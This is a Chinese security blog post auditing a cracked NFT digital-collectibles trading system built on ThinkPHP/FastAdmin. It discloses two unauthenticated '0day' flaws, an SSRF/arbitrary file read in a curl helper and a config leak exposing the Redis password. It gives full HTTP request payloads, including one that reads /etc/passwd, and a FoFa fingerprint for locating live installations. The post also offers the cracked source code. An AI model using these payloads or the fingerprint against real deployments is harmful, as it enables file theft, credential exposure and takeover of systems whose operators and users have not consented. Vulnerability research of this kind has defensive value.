点击上方蓝字关注我们 并设为星标
0x00 前言
解密版元宇宙NFT交易系统/数字藏品3D合成/空投盲盒玩法抽集卡,此源码非市面上分享加密授权版本,此版本从新二开 阿里的实名 短信,去除原本的加密和授权,安装使用无任何影响.
FoFa指纹:"./static/js/chunk-vendors.a6c3c211.js" (这种前端一般都在二级目录下,fofa搜不到)
框架:ThinkPHP 5.0.24 FastAdmin Debug:True
0x01 前台任意文件读取漏洞
位于 /api/controller/nft/Ants.php 控制器中的 toCurl 方法存在curl_exec函数,且url传参可控,导致漏洞产生.
/**
* @Explain : Curl请求
* @param $url
* @param array $param
* @return bool|string|string[]
* @Date : 2022/4/5 下午7:21
* @Author : By Jensen
*/
public static function toCurl($url, $param = array())
{
$postUrl = $url;
$curlPost = $param;
$ch = curl_init();//初始化curl
curl_setopt($ch, CURLOPT_URL, $postUrl);//抓取指定网页
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Token: ' . self::$Token]);
$data = curl_exec($ch);//运行curl
curl_close($ch);
$data = str_replace(""", '"', $data);
return $data;
}
Payload:
GET /api/nft/ants/toCurl?url=file:///etc/passwd HTTP/2
Host: 127.0.0.1:81
Cache-Control: max-age=0
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
0x02 前台敏感信息泄露漏洞
位于 /api/controller/nft/Index.php 控制器的 index 方法 通过 get_addon_config 方法获取到了nft插件的信息,其中泄露了Redis的密码,可导致命令执行等漏洞产生.
/**
* 首页
*
*/
public function index(): void
{
$banner_model = new Banner();
$banner = $banner_model->field('id, article_id, image,pages')->where('status', 1)->select();
$config = get_addon_config('nft');
$config = $config['ini'];
$this->success('请求成功', [
'banner' => $banner,
'config'=>$config
]);
}
Payload:
GET /api/nft/index HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Cookie: PHPSESSID=719psss6jnv9112q6spakfmt32; md5=201920; visitor_source=http%3A%2F%2F127.0.0.1%3A81%2Findex; think_var=th-th
Host: 127.0.0.1:81
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转,RCE
NFT数藏系统源码关注公众号,发送 240910 获取.
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):某元宇宙NFT数藏交易系统代码审计
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论